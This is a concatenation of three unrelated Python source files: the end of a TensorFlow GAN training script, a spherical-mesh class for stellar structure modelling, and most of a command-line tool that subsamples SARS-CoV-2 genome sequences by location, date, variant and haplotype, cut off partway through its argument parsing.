        self.conv3t = Conv2DTranspose(1, 5, strides=2,
                                      activation='tanh',
                                      padding='SAME', input_shape=(14, 14, 64), use_bias=False)

    def call(self, x):
        out = self.leaky_relu1(self.bn1(self.d1(x)))
        out = self.resh(out)
        out = self.leaky_relu2(self.bn2(self.conv1t(out)))
        out = self.leaky_relu3(self.bn3(self.conv2t(out)))
        return self.conv3t(out)
def get_train_step_gan(batch_size, latent_dim):
    """ Wrapper for training step, needed if running more than one model
    per run

    :param int batch_size: number of latent samples drawn per step
    :param int latent_dim: dimensionality of the latent (noise) space
    :return: train step function
    """
    @tf.function
    def train_step(generator, discriminator, im_batch):
        # Fresh latent noise for this step.
        noise = sample_Z(batch_size, latent_dim)
        # Two nested tapes over a single forward pass: the outer tape
        # provides the generator's gradients, the inner one the
        # discriminator's.
        with tf.GradientTape() as gan_grad_tape:
            with tf.GradientTape() as disc_grad_tape:
                gen_images = generator(noise, training=True)
                preds_real = discriminator(im_batch, training=True)
                preds_fake = discriminator(gen_images, training=True)
                loss_gen = loss_generator_obj(preds_fake)
                loss_disc = loss_discriminator_obj(preds_real, preds_fake)
            # Update the discriminator first, then the generator; each
            # optimizer only touches its own network's variables.
            disc_grads = disc_grad_tape.gradient(loss_disc,
                                                 discriminator.trainable_variables)
            disc_optimizer.apply_gradients(zip(disc_grads,
                                               discriminator.trainable_variables))
        gen_grads = gan_grad_tape.gradient(loss_gen, generator.trainable_variables)
        gen_optimizer.apply_gradients(zip(gen_grads, generator.trainable_variables))
        # Accumulate the module-level running metrics.
        d_train_loss(loss_disc)
        g_train_loss(loss_gen)
        g_train_accuracy(tf.ones_like(preds_fake), preds_fake)
    return train_step
def sample_Z(batch_size, latent_dim):
    """Draw a (batch_size, latent_dim) batch of standard-normal latent vectors."""
    shape = [batch_size, latent_dim]
    return tf.random.normal(shape)
def train(generator, discriminator, images, latent_dim, num_epochs, batch_size):
    """ Trains a GAN (generator + discriminator pair) over an image collection.

    After each epoch the running discriminator/generator losses are printed
    and reset; after training, a 4x4 grid of images generated from a fixed
    noise sample is displayed.

    :param Model generator: generator mapping latent vectors to images
    :param Model discriminator: discriminator mapping images to real/fake logits
    :param images: training images array (values assumed in [-1, 1];
        de-normalized with *127.5 + 127.5 for display)
    :param int latent_dim: dimensionality of the latent (noise) space
    :param int num_epochs: number of epochs to train with
    :param int batch_size: batch size
    """
    # Fixed noise so progress can be inspected on the same latent points.
    sample_noise = sample_Z(16, latent_dim)
    # Shuffle buffer size, not a seed (presumably the dataset size, so the
    # whole set is shuffled each epoch).
    shuffle_buffer_size = 60000
    train_ds = tf.data.Dataset.from_tensor_slices(images) \
        .shuffle(shuffle_buffer_size) \
        .batch(batch_size)
    train_step = get_train_step_gan(batch_size, latent_dim)
    for epoch in range(num_epochs):
        for image_batch in train_ds:
            train_step(generator, discriminator, image_batch)
        print(f'Epoch {epoch + 1} : Disc loss: {d_train_loss.result()}, Gen loss: {g_train_loss.result()}')
        # Reset the metrics for the next epoch
        d_train_loss.reset_states()
        g_train_loss.reset_states()
    # Show a 4x4 grid of samples from the fixed noise.
    generated_images_tensor = generator(sample_noise, training=False)
    plt.figure(figsize=(4, 4))
    for i in range(generated_images_tensor.shape[0]):
        plt.subplot(4, 4, i + 1)
        # de-normalize from [-1, 1] back to [0, 255] grayscale
        plt.imshow(generated_images_tensor[i, :, :, 0] * 127.5 + 127.5, cmap='gray')
        plt.axis('off')
    plt.show()
|
import numpy as np
import logging
from collections import OrderedDict
import astropy.units as u
logging.basicConfig(format='%(asctime)s: %(message)s', level=logging.INFO)
class SphericalMesh(object):
    """Spherical mesh on a (pot, theta, phi) coordinate grid."""

    def __init__(self, **kwargs):
        """
        A spherical mesh is initialized with a coordinate grid in (pot, theta, phi).
        The initial potential array is dimensionless, to be scaled based on object
        type and surface potential computed from structure or provided by user.

        Parameters
        ----------
        **kwargs
            Can be:
            dims: list, np.ndarray
                Dimensions of the grid (Npot, Ntheta, Nphi)
            atm_range: float
                Relative size of the atmosphere with respect to surface potential.
        """
        # Must be None before the dims/atm_range setters run for the first
        # time: both setters rebuild the grid only when one already exists.
        self.__coords = None
        self.dims = kwargs.get('dims', [50, 50, 50])
        self.atm_range = kwargs.get('atm_range', 0.01)
        pots = np.linspace(1., 1. + self.atm_range, self.dims[0])
        thetas = np.linspace(0., np.pi / 2, self.dims[1]) * self.default_units['theta']
        phis = np.linspace(0., np.pi, self.dims[2]) * self.default_units['phi']
        self.__coords = OrderedDict([('pots', pots), ('thetas', thetas), ('phis', phis)])

    @property
    def dims(self):
        # Grid dimensions (Npot, Ntheta, Nphi).
        return self.__dims

    @dims.setter
    def dims(self, value):
        if isinstance(value, (list, np.ndarray)):
            value = np.array(value)
            if value.shape == (3,):
                self.__dims = value
                if self.__coords is not None:
                    # Recompute the grid at the new resolution. The potential
                    # axis keeps its current scale (pots[0]); theta/phi are
                    # rebuilt WITH the same angular units as in __init__
                    # (the previous version dropped the units here).
                    pots = self.__coords['pots'][0] * np.linspace(1., 1. + self.atm_range, self.__dims[0])
                    thetas = np.linspace(0., np.pi / 2, self.__dims[1]) * self.default_units['theta']
                    phis = np.linspace(0., np.pi, self.__dims[2]) * self.default_units['phi']
                    self.__coords = OrderedDict([('pots', pots), ('thetas', thetas), ('phis', phis)])
            else:
                raise TypeError('Wrong array shape: {}. \
                dims parameter array needs to have shape (3,)'.format(value.shape))
        else:
            raise TypeError('dims parameter needs to be an array of shape (3,).')

    @property
    def atm_range(self):
        # Relative atmosphere thickness w.r.t. the surface potential.
        return self.__atm_range

    @atm_range.setter
    def atm_range(self, value):
        self.__atm_range = value
        if self.__coords is not None:
            # Rescale the potential axis in place, preserving pots[0].
            self.__coords['pots'] = self.__coords['pots'][0] * np.linspace(1., 1. + self.__atm_range, self.__dims[0])

    @property
    def coords(self):
        # OrderedDict of the grid arrays: 'pots', 'thetas', 'phis'.
        return self.__coords

    def _params(self):
        """
        Returns
        -------
        List of updateable parameters.
        """
        return [key for key in dir(self) if not key.startswith('_')]

    @property
    def default_units(self):
        # Units attached to the coordinate arrays (astropy units).
        return {'r': u.R_sun, 'theta': u.rad, 'phi': u.rad}
class StarSphericalMesh(SphericalMesh):
    """Spherical mesh attached to a star instance whose ``structure``
    supplies per-point radii and surface normals."""

    def __init__(self, starinstance, **kwargs):
        super(StarSphericalMesh, self).__init__(**kwargs)
        self.__star = starinstance

    def _params(self):
        """
        Returns
        -------
        List of updateable parameters.
        """
        return [key for key in dir(self) if not key.startswith('_')]

    def _compute_point(self, arg):
        """Compute (radius, normal) for one mesh point.

        ``arg`` is the flat index: arg = k + nphis*j + (nthetas*nphis)*i,
        where i/j/k index pots/thetas/phis respectively.
        """
        logging.info('Computing mesh point %s', arg)
        # Floor division: plain "/" yields floats under Python 3 and would
        # break array indexing below.
        i = arg // (self.dims[1] * self.dims[2])
        jrem = arg % (self.dims[1] * self.dims[2])
        j = jrem // self.dims[2]
        k = jrem % self.dims[2]
        pot = self.coords['pots'][i]
        theta = self.coords['thetas'][j]
        phi = self.coords['phis'][k]
        direction = np.array([np.sin(theta) * np.cos(phi),
                              np.sin(theta) * np.sin(phi),
                              np.cos(theta)])
        r = self.__star.structure._compute_radius(pot=pot, direction=direction)
        n = self.__star.structure._compute_normal(r)
        return (arg, r, n)

    def _compute(self, parallel=True, **kwargs):
        """Compute radii and normals for the whole mesh.

        Recognized **kwargs update matching mesh parameters first. With
        parallel=True the points are distributed over a multiprocessing
        pool; results are stored in self.rs (scaled by the star's
        structure scale) and self.ns.
        """
        if kwargs:
            newparams = set(kwargs.keys()) & set(self._params())
            if newparams:
                for param in newparams:
                    setattr(self, param, kwargs[param])
        meshsize = self.dims[0] * self.dims[1] * self.dims[2]
        if parallel:
            import multiprocessing as mp
            import sys
            import types
            if sys.version_info[0] < 3:
                # Python 2 cannot pickle bound methods, which pool.map
                # needs for self._compute_point; register a reducer.
                # Python 3 pickles bound methods natively, and the py2-only
                # im_* attributes would break there, so only register on py2.
                import copy_reg as copyreg

                def _pickle_method(m):
                    class_self = m.im_class if m.im_self is None else m.im_self
                    return getattr, (class_self, m.im_func.func_name)

                copyreg.pickle(types.MethodType, _pickle_method)
            numproc = mp.cpu_count()
            print('Available processors: %s' % numproc)
            pool = mp.Pool(processes=numproc)
            results = pool.map(self._compute_point, range(meshsize))
            # Results arrive unordered; sort by the flat index (tuple[0]).
            results.sort()
            rsns = np.array([[result[1], result[2]] for result in results])
            rs = rsns[:, 0]
            normals = rsns[:, 1]
        else:
            rs = np.zeros((meshsize, 3))
            normals = np.zeros((meshsize, 3))
            for arg in range(meshsize):
                arg, rs[arg], normals[arg] = self._compute_point(arg)
        self.rs = rs * self.__star.structure.scale
        self.ns = normals
class ContactBinarySphericalMesh(SphericalMesh):
    # Spherical mesh for a contact-binary star instance.
    def __init__(self, starinstance, **kwargs):
        """
        Build the base (pot, theta, phi) grid via SphericalMesh and store the
        star instance (presumably consumed like StarSphericalMesh's star when
        computing the mesh -- not visible here, confirm).
        """
        super(ContactBinarySphericalMesh,self).__init__(**kwargs)
        self.__star = starinstance
|
<reponame>wuaipinglab/covSampler
'''
Subsampling of SARS-CoV-2 genome sequences: comprehensive and representative
subsampling of sequences filtered by location, collection date and variant.
'''
import os
import re
import time
import argparse
import pandas as pd
def get_target_ids(file, args, genome_path):
    '''
    get accession id of sequences in selected range (location, date and variants)
    :param file: str, infos file path (tab-separated, header line starts with "ID")
    :param args: argparse, args (uses args.location, args.dateStart,
                 args.dateEnd and args.variants)
    :param genome_path: str, SARS-CoV-2 genome file path
    :return: dict, key: accession id; value: infos of sequences
             list, accession id of sequences in selected range,
             sorted by the numeric part of the accession id
    '''
    # read infos from infos.tsv
    infos = {}
    with open(file) as f:
        lines = f.readlines()
        for line in lines:
            if not line.startswith('ID'):
                lineList = line.strip().split('\t')
                seqID = lineList[0]
                seqRegion = lineList[1]
                seqCountry = lineList[2]
                seqDivision = lineList[3]
                seqDate = lineList[4]
                seqPL = lineList[5]
                seqNC = lineList[6]
                seqGC = lineList[7]
                seqNT = lineList[8]
                seqAA = lineList[9]
                infos[seqID] = {
                    'region': seqRegion,
                    'country': seqCountry,
                    'division': seqDivision,
                    'date': seqDate,
                    'pangoLineage': seqPL,
                    'nextstrainClade': seqNC,
                    'gisaidClade': seqGC,
                    'nt': seqNT,
                    'aa': seqAA
                }
    target_ids = []
    # add accession id of sequences in selected location
    # (location format: "Region", "Region/Country" or "Region/Country/Division")
    if args.location == 'Global':
        target_ids = list(infos.keys())
    elif args.location.count('/') == 0:
        for i in infos:
            if infos[i]['region'] == args.location:
                target_ids.append(i)
    elif args.location.count('/') == 1:
        for i in infos:
            if infos[i]['region'] == args.location.split('/')[0] and infos[i]['country'] == args.location.split('/')[1]:
                target_ids.append(i)
    elif args.location.count('/') == 2:
        for i in infos:
            if infos[i]['region'] == args.location.split('/')[0] and infos[i]['country'] == args.location.split('/')[1] and infos[i]['division'] == args.location.split('/')[2]:
                target_ids.append(i)
    # remove accession id of sequences not in selected date range
    # (dates compared as strings; assumes ISO-like YYYY-MM-DD format -- confirm)
    dropDate = []
    for i in target_ids:
        if not args.dateStart <= infos[i]['date'] <= args.dateEnd:
            dropDate.append(i)
    target_ids = list(set(target_ids)-set(dropDate))
    # remove accession id of sequences not belong to selected variant(s);
    # each variant filter is applied in turn (intersection of all filters)
    if args.variants is not None:
        for variant in args.variants:
            dropVariant = []
            # lineage
            if variant.startswith('Lineage'):
                # VOC or VOI (example: Lineage/WHO/Alpha)
                if variant.split('/')[1] == 'WHO':
                    # Map Pango lineage prefixes to WHO labels.
                    PANGO_WHO = {
                        'B.1.1.7': 'Alpha',
                        'Q': 'Alpha',
                        'B.1.351': 'Beta',
                        'P.1': 'Gamma',
                        'B.1.617.2': 'Delta',
                        'AY': 'Delta',
                        'B.1.1.529': 'Omicron',
                        'BA': 'Omicron',
                        'C.37': 'Lambda',
                        'B.1.621': 'Mu'
                    }
                    for i in target_ids:
                        isVar = False
                        # A sequence matches if its Pango lineage equals a
                        # mapped lineage or is a sublineage of it ("X." prefix).
                        for l in PANGO_WHO:
                            if infos[i]['pangoLineage'] == l or infos[i]['pangoLineage'].startswith(l+'.'):
                                lWHO = PANGO_WHO[l]
                                if lWHO == variant.split('/')[2]:
                                    isVar = True
                        if not isVar:
                            dropVariant.append(i)
                # pango lineage (example: Lineage/Pango_lineage/B.1.1.7)
                elif variant.split('/')[1] == 'Pango_lineage':
                    for i in target_ids:
                        if infos[i]['pangoLineage'] != variant.split('/')[2]:
                            dropVariant.append(i)
                # nextstrain clade (example: Lineage/Nextstrain_clade/20I (Alpha, V1))
                elif variant.split('/')[1] == 'Nextstrain_clade':
                    for i in target_ids:
                        if infos[i]['nextstrainClade'] != variant.split('/')[2]:
                            dropVariant.append(i)
                # gisaid clade (example: Lineage/Gisaid_clade/G)
                elif variant.split('/')[1] == 'Gisaid_clade':
                    for i in target_ids:
                        if infos[i]['gisaidClade'] != variant.split('/')[2]:
                            dropVariant.append(i)
            # site
            elif variant.startswith('Site'):
                genome = pd.read_csv(genome_path, index_col=0)
                # nucleotide site
                if variant.split('/')[1] == 'Nucleotide':
                    genomePos = int(variant.split('/')[2][:-1])
                    ref = genome[genome['genomePos'] == genomePos]['nucleotide'].values[0]
                    # ref (example: Site/Nucleotide/23403A)
                    # keep sequences with NO substitution recorded at the site
                    if variant.split('/')[2][-1] == ref:
                        for i in target_ids:
                            if re.search('[^0-9]'+str(genomePos)+'[^0-9]', infos[i]['nt']):
                                dropVariant.append(i)
                    # substitution (example: Site/Nucleotide/23403G)
                    else:
                        for i in target_ids:
                            if not re.search('[^0-9]'+variant.split('/')[2], infos[i]['nt']):
                                dropVariant.append(i)
                # amino acid site
                elif variant.split('/')[1] == 'Amino_acid':
                    product = variant.split('/')[2].split('_')[0]
                    if not (variant.split('/')[2].endswith('del') or variant.split('/')[2].endswith('stop')):
                        aaPos = int(variant.split('/')[2].split('_')[1][:-1])
                        ref = genome[(genome['product'] == product) & (genome['aaPos'] == aaPos)]['aa'].values[0]
                        # ref (example: Site/Amino_acid/Spike_614D)
                        # keep sequences with NO change recorded at the site
                        if variant.split('/')[2][-1] == ref:
                            for i in target_ids:
                                if re.search(product+'_'+ref+str(aaPos)+'[^0-9]', infos[i]['aa']):
                                    dropVariant.append(i)
                        # substitution (example: Site/Amino_acid/Spike_614G)
                        else:
                            for i in target_ids:
                                if product+'_'+ref+variant.split('/')[2].split('_')[1] not in infos[i]['aa']:
                                    dropVariant.append(i)
                    else:
                        # deletion (example: Site/Amino_acid/Spike_69del)
                        if variant.split('/')[2].endswith('del'):
                            aaPos = int(variant.split('/')[2].split('_')[1][:-3])
                        # stop (example: Site/Amino_acid/NS8_Q27stop)
                        elif variant.split('/')[2].endswith('stop'):
                            aaPos = int(variant.split('/')[2].split('_')[1][:-4])
                        ref = genome[(genome['product'] == product) & (genome['aaPos'] == aaPos)]['aa'].values[0]
                        for i in target_ids:
                            if product+'_'+ref+variant.split('/')[2].split('_')[1] not in infos[i]['aa']:
                                dropVariant.append(i)
            target_ids = list(set(target_ids)-set(dropVariant))
    # Stable ordering by the numeric part of the accession id (EPI_ISL_<n>).
    target_ids = sorted(target_ids, key=lambda x:int(x.split('_')[2]))
    return infos, target_ids
def read_haplotype_sequence(file, target_ids):
    '''
    read haplotype sequences (constructed by combining pre-calculated SARS-CoV-2
    key sites) of sequences in selected range from haplotype_sequence.txt
    :param file: str, haplotype sequence file path ("<id>:<snps>" per line)
    :param target_ids: list, accession id of sequences in selected range
    :return: dict, key: accession id; value: snps at key sites
             (a single space when the sequence has no snps at key sites)
    '''
    all_seqs = {}
    with open(file) as f:
        for line in f:
            # key before ':', snps after; empty snps are stored as ' '
            key = line.split(':')[0]
            value = line.strip().split(':')[1]
            all_seqs[key] = value if value != '' else ' '
    return {acc: all_seqs[acc] for acc in target_ids}
def read_path(file, target_ids, infos):
    '''
    read divergent pathways of sequences in selected range from divergent_pathway.csv
    divide divergent pathways by continent
    :param file: str, divergent pathways file path ("<id>,<pathway>" per line)
    :param target_ids: list, accession id of sequences in selected range
    :param infos: dict, key: accession id; value: infos of sequences
    :return: dict, key: continent; value: divergent pathways (each a list of
             accession ids), largest pathway first
    '''
    # accession id -> pathway id, for every data line in the file
    seq_path = {}
    with open(file) as f:
        for line in f:
            if line.startswith('EPI_ISL'):
                seq_path[line.split(',')[0]] = line.strip().split(',')[1]
    # pathway id -> accession ids (restricted to the selected range)
    pathway_members = {}
    for acc in target_ids:
        pathway_members.setdefault(seq_path[acc], []).append(acc)
    # group pathways by the continent of their first member
    paths_in_continent = {}
    for members in pathway_members.values():
        region = infos[members[0]]['region']
        paths_in_continent.setdefault(region, []).append(members)
    # largest pathways first within each continent
    return {c: sorted(ps, key=len, reverse=True) for c, ps in paths_in_continent.items()}
def calculate_continent_sample_number(required_sample_num, seqs, infos):
    '''
    distribute the number of subsamples to each continent
    Allocation is round-robin over continents ordered by sequence count
    (largest first), never exceeding a continent's own sequence count.
    If required_sample_num exceeds the total number of sequences, every
    continent is filled to capacity and the remainder is dropped (the
    unguarded round-robin would otherwise loop forever).
    :param required_sample_num: int, number of subsamples
    :param seqs: dict, key: accession id; value: snps at key sites
    :param infos: dict, key: accession id; value: infos of sequences
    :return: dict, key: continent; value: number of subsamples in the continent
    '''
    s = required_sample_num
    # sequence count per continent, largest first
    continent_genome_num = {}
    for i in seqs:
        continent = infos[i]['region']
        continent_genome_num[continent] = continent_genome_num.get(continent, 0) + 1
    continent_genome_num = dict(sorted(continent_genome_num.items(), key=lambda x: x[1], reverse=True))
    continent_sample_number = {i: 0 for i in continent_genome_num}
    while s > 0:
        allocated_this_round = False
        for i in continent_sample_number:
            if s == 0:
                break
            if continent_sample_number[i] < continent_genome_num[i]:
                continent_sample_number[i] += 1
                s -= 1
                allocated_this_round = True
        if not allocated_this_round:
            # all continents at capacity; cannot place remaining samples
            break
    return continent_sample_number
def com_sampling(required_sample_num, seqs, infos, paths_in_continent):
    '''
    comprehensive subsampling
    Samples are distributed hierarchically by round-robin at each level:
    continent -> divergent pathway -> month -> haplotype, then the most
    recent accessions are taken within each haplotype.
    :param required_sample_num: int, number of subsamples
    :param seqs: dict, key: accession id; value: snps at key sites
    :param infos: dict, key: accession id; value: infos of sequences
    :param paths_in_continent: dict, key: continent; value: divergent pathways
    :return: list, accession id of subsamples, sorted by accession number
    '''
    continent_sample_number = calculate_continent_sample_number(required_sample_num, seqs, infos)
    com_samples = []
    # sampling in each continent
    for continent in paths_in_continent:
        sample_number_in_continent = continent_sample_number[continent]
        # distribute the number of subsamples (in the continent) to each divergent pathways
        # (round-robin, capped by each pathway's size)
        sample_number_in_paths = []
        for i in range(0, len(paths_in_continent[continent])):
            sample_number_in_paths.append(0)
        while sample_number_in_continent > 0:
            for i in range(0, len(sample_number_in_paths)):
                if sample_number_in_continent == 0:
                    break
                if sample_number_in_paths[i] < len(paths_in_continent[continent][i]):
                    sample_number_in_paths[i] += 1
                    sample_number_in_continent -= 1
        # sampling in each divergent pathway
        for i in range(0, len(paths_in_continent[continent])):
            path = paths_in_continent[continent][i]
            # distribute the number of subsamples (in the divergent pathway) to each month
            # (months ordered newest first)
            seq_in_months = {}
            for seq_id in path:
                month = infos[seq_id]['date'][:7]
                seq_in_months.setdefault(month, []).append(seq_id)
            seq_in_months = dict(sorted(seq_in_months.items(), key=lambda x: x[0], reverse=True))
            sample_number_in_path = sample_number_in_paths[i]
            sample_number_in_months = {}
            for m in seq_in_months:
                sample_number_in_months[m] = 0
            while sample_number_in_path > 0:
                for m in seq_in_months:
                    if sample_number_in_path == 0:
                        break
                    if sample_number_in_months[m] < len(seq_in_months[m]):
                        sample_number_in_months[m] += 1
                        sample_number_in_path -= 1
            # sampling in each month
            for m in seq_in_months:
                seq_in_month = seq_in_months[m]
                # distribute the number of subsamples (in the month) to each haplotype
                # (haplotypes with more key-site snps first)
                seq_in_haplotype_sequences = {}
                for seq_id in seq_in_month:
                    haplotype_sequence = seqs[seq_id]
                    seq_in_haplotype_sequences.setdefault(haplotype_sequence, []).append(seq_id)
                seq_in_haplotype_sequences = dict(sorted(seq_in_haplotype_sequences.items(),
                                                         key=lambda x: len(x[0].split(',')), reverse=True))
                sample_number_in_month = sample_number_in_months[m]
                sample_number_in_haplotype_sequences = {}
                for v in seq_in_haplotype_sequences:
                    sample_number_in_haplotype_sequences[v] = 0
                while sample_number_in_month > 0:
                    for v in seq_in_haplotype_sequences:
                        if sample_number_in_month == 0:
                            break
                        if sample_number_in_haplotype_sequences[v] < len(seq_in_haplotype_sequences[v]):
                            sample_number_in_haplotype_sequences[v] += 1
                            sample_number_in_month -= 1
                # sampling in each haplotype: take the highest accession
                # numbers (most recently submitted) first
                for v in seq_in_haplotype_sequences:
                    seq_in_haplotype_sequence = seq_in_haplotype_sequences[v]
                    sample_number_in_haplotype_sequence = sample_number_in_haplotype_sequences[v]
                    seq_in_haplotype_sequence = list(sorted(seq_in_haplotype_sequence,
                                                            key=lambda x: int(x.split('_')[2]), reverse=True))
                    com_samples.extend(seq_in_haplotype_sequence[:sample_number_in_haplotype_sequence])
    com_samples = sorted(com_samples, key=lambda x: int(x.split('_')[2]))
    return com_samples
def calculate_continent_genome_num_proportion(seqs, infos):
    '''
    calculate the proportion and number of sequences in each continent
    :param seqs: dict, key: accession id; value: snps at key sites
    :param infos: dict, key: accession id; value: infos of sequences
    :return: dict, key: continent; value: proportion and number of sequences in the continent
    '''
    counts = {}
    for acc in seqs:
        region = infos[acc]['region']
        counts[region] = counts.get(region, 0) + 1
    total = len(seqs)
    return {region: {'proportion': n / total, 'count': n} for region, n in counts.items()}
def calculate_continent_threshold(required_sample_num, continent_genome_num_proportion, paths_in_continent):
    '''
    1. distribute the number of subsamples to each continent, proportionally
       to the continent's share of sequences in the selected range
    2. find, per continent, the smallest integer threshold >= 1 such that
       sum over pathways of floor(len(pathway) / threshold) does not exceed
       the continent's quota
    :param required_sample_num: int, number of subsamples
    :param continent_genome_num_proportion:
        dict, key: continent;
        value: proportion and number of sequences in the continent
    :param paths_in_continent: dict, key: continent; value: divergent pathways
    :return: dict, key: continent;
             value: threshold and corresponding number of subsamples in
             all divergent pathways in the continent
    '''
    continent_threshold = {}
    for continent, paths in paths_in_continent.items():
        quota = required_sample_num * continent_genome_num_proportion[continent]['proportion']
        threshold = 1
        while True:
            actual = 0
            for path in paths:
                actual += len(path) // threshold
                if actual > quota:
                    # already over quota: no need to finish the sum
                    break
            if actual <= quota:
                break
            threshold += 1
        continent_threshold[continent] = {'threshold': threshold, 'actual_num': actual}
    return continent_threshold
def calculate_continent_extra_sample_num(required_sample_num, continent_genome_num_proportion, continent_threshold):
    '''
    calculate the number of extra subsamples of each continent after threshold calculation
    Extras are handed out round-robin, continents with the fewest
    threshold-based samples first, capped by each continent's sequence
    count. If the extras exceed the total remaining capacity, every
    continent is filled to capacity and the remainder is dropped (the
    unguarded round-robin would otherwise loop forever).
    :param required_sample_num: int, number of subsamples
    :param continent_genome_num_proportion:
        dict, key: continent;
        value: proportion and number of sequences in the continent
    :param continent_threshold:
        dict, key: continent;
        value: threshold and corresponding number of subsamples in
        all divergent pathways in the continent
    :return: dict, key: continent;
             value: the number of extra subsamples of the continent
             after threshold calculation
    '''
    continent_extra_sample_num = {}
    sample_number_with_threshold = 0
    for i in continent_threshold:
        sample_number_with_threshold += continent_threshold[i]['actual_num']
    extra_sample_num = required_sample_num - sample_number_with_threshold
    # continents with the fewest threshold-based samples get extras first
    continent_list_sorted = [i[0] for i in sorted(continent_threshold.items(), key=lambda x: x[1]['actual_num'])]
    for i in continent_list_sorted:
        continent_extra_sample_num[i] = 0
    while extra_sample_num > 0:
        placed = False
        for i in continent_list_sorted:
            if extra_sample_num == 0:
                break
            if continent_threshold[i]['actual_num'] + continent_extra_sample_num[i] < continent_genome_num_proportion[i]['count']:
                continent_extra_sample_num[i] += 1
                extra_sample_num -= 1
                placed = True
        if not placed:
            # every continent is at capacity; guard against an endless loop
            break
    return continent_extra_sample_num
def rep_sampling(required_sample_num, seqs, infos, paths_in_continent):
    '''
    representative subsampling
    Quotas cascade down a hierarchy: continent -> divergent pathway ->
    collection month -> haplotype; the newest sequences are then taken
    within each haplotype.
    :param required_sample_num: int, number of subsamples
    :param seqs: dict, key: accession id; value: snps at key sites
    :param infos: dict, key: accession id; value: infos of sequences
    :param paths_in_continent: dict, key: continent; value: divergent pathways
    :return: list, accession id of subsamples
    '''
    continent_genome_num_proportion = calculate_continent_genome_num_proportion(seqs, infos)
    continent_threshold = calculate_continent_threshold(required_sample_num, continent_genome_num_proportion, paths_in_continent)
    continent_extra_sample_num = calculate_continent_extra_sample_num(required_sample_num, continent_genome_num_proportion, continent_threshold)
    rep_samples = []
    # sampling in each continent
    for continent in paths_in_continent:
        # distribute the number of subsamples (in the continent) to each divergent pathways
        sample_number_in_paths = []
        for path in paths_in_continent[continent]:
            sample_number_in_paths.append(int(len(path)/continent_threshold[continent]['threshold']))
        # round-robin the continent's extra quota over pathways that still
        # have unsampled sequences
        extra_sample_number_in_continent = continent_extra_sample_num[continent]
        while extra_sample_number_in_continent > 0:
            for i in range(0, len(sample_number_in_paths)):
                if extra_sample_number_in_continent == 0:
                    break
                if sample_number_in_paths[i] < len(paths_in_continent[continent][i]):
                    sample_number_in_paths[i] += 1
                    extra_sample_number_in_continent -= 1
        # sampling in each divergent pathway
        for i in range(0, len(paths_in_continent[continent])):
            path = paths_in_continent[continent][i]
            # distribute the number of subsamples (in the divergent pathway) to each month
            # month key is the 'YYYY-MM' prefix of the collection date
            seq_in_months = {}
            for seq_id in path:
                month = infos[seq_id]['date'][:7]
                seq_in_months.setdefault(month, []).append(seq_id)
            # most recent months first, so they are favoured by the round-robin below
            seq_in_months = dict(sorted(seq_in_months.items(), key=lambda x: x[0], reverse=True))
            sample_number_in_path = sample_number_in_paths[i]
            sample_number_in_months = {}
            for m in seq_in_months:
                sample_number_in_months[m] = 0
            while sample_number_in_path > 0:
                for m in seq_in_months:
                    if sample_number_in_path == 0:
                        break
                    if sample_number_in_months[m] < len(seq_in_months[m]):
                        sample_number_in_months[m] += 1
                        sample_number_in_path -= 1
            # sampling in each month
            for m in seq_in_months:
                seq_in_month = seq_in_months[m]
                # distribute the number of subsamples (in the month) to each haplotype
                seq_in_haplotype_sequences = {}
                for seq_id in seq_in_month:
                    haplotype_sequence = seqs[seq_id]
                    seq_in_haplotype_sequences.setdefault(haplotype_sequence, []).append(seq_id)
                # largest haplotype groups first, so they receive quota first
                seq_in_haplotype_sequences = dict(sorted(seq_in_haplotype_sequences.items(),
                                                         key=lambda x: len(x[1]), reverse=True))
                sample_number_in_month = sample_number_in_months[m]
                sample_number_in_haplotype_sequences = {}
                for v in seq_in_haplotype_sequences:
                    sample_number_in_haplotype_sequences[v] = 0
                while sample_number_in_month > 0:
                    for v in seq_in_haplotype_sequences:
                        if sample_number_in_month == 0:
                            break
                        if sample_number_in_haplotype_sequences[v] < len(seq_in_haplotype_sequences[v]):
                            sample_number_in_haplotype_sequences[v] += 1
                            sample_number_in_month -= 1
                # sampling in each haplotype
                for v in seq_in_haplotype_sequences:
                    seq_in_haplotype_sequence = seq_in_haplotype_sequences[v]
                    sample_number_in_haplotype_sequence = sample_number_in_haplotype_sequences[v]
                    # assumes accession ids look like 'xxx_yyy_<number>' with a
                    # sortable numeric third field -- TODO confirm id format
                    seq_in_haplotype_sequence = list(sorted(seq_in_haplotype_sequence,
                                                            key=lambda x: int(x.split('_')[2]), reverse=True))
                    rep_samples.extend(seq_in_haplotype_sequence[:sample_number_in_haplotype_sequence])
    # stable output order by the numeric id field
    rep_samples = sorted(rep_samples, key=lambda x: int(x.split('_')[2]))
    return rep_samples
def write_new_file(file, samples, DATE, args, target_ids):
    """Write the subsampling report to *file*: '##' metadata header lines
    followed by '# ID' and one accession id per line.

    :param file: output file path
    :param samples: list of selected accession ids
    :param DATE: data version string
    :param args: parsed CLI namespace (location, dateStart, dateEnd,
                 variants, characteristic, size)
    :param target_ids: all accession ids in the selected range
    """
    timestamp = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
    header = []
    header.append('## File time: {} (Beijing Time)'.format(timestamp))
    header.append('## Data version: {}'.format(DATE))
    header.append('## Location of samples: {}'.format(args.location))
    header.append('## Start date of samples: {}'.format(args.dateStart))
    header.append('## End date of samples: {}'.format(args.dateEnd))
    if args.variants is not None:
        for variant in args.variants:
            # .replace('//','') works around a front-end artifact in variant names
            header.append('## Variant of samples: {}'.format(variant.replace('//', '')))
    header.append('## Number of all samples in range: {}'.format(len(target_ids)))
    header.append('## Sampling characteristic: {}'.format(args.characteristic))
    if args.size > len(target_ids):
        # Requested more than available: record the request and the actual size.
        header.append('## Required sample size: {}'.format(args.size))
        header.append('## WARNING!!! Required sample size > number of all samples in range')
        header.append('## Actual sample size: {}'.format(len(target_ids)))
    else:
        header.append('## Sample size: {}'.format(args.size))
    header.append('# ID')
    with open(file, 'w') as f:
        f.write('\n'.join(header) + '\n')
        f.writelines(s + '\n' for s in samples)
def main():
    """Command-line entry point: parse arguments, load data, subsample, and
    write the result to <output>/samples.txt."""
    # command line interface
    parser = argparse.ArgumentParser(description='A subsampling method for large-scale SARS-CoV-2 genomes')
    parser.add_argument('--dirpath', required=True, help='Data directory path')
    parser.add_argument('--location', required=True, help='Location of subsamples')
    parser.add_argument('--dateStart', required=True, help='Start date of subsamples')
    parser.add_argument('--dateEnd', required=True, help='End date of subsamples')
    parser.add_argument('--variants', action='append', help='Variants of subsamples')
    parser.add_argument('--size', type=int, required=True, help='Number of subsamples')
    # choices= makes argparse reject unknown characteristics up front; previously
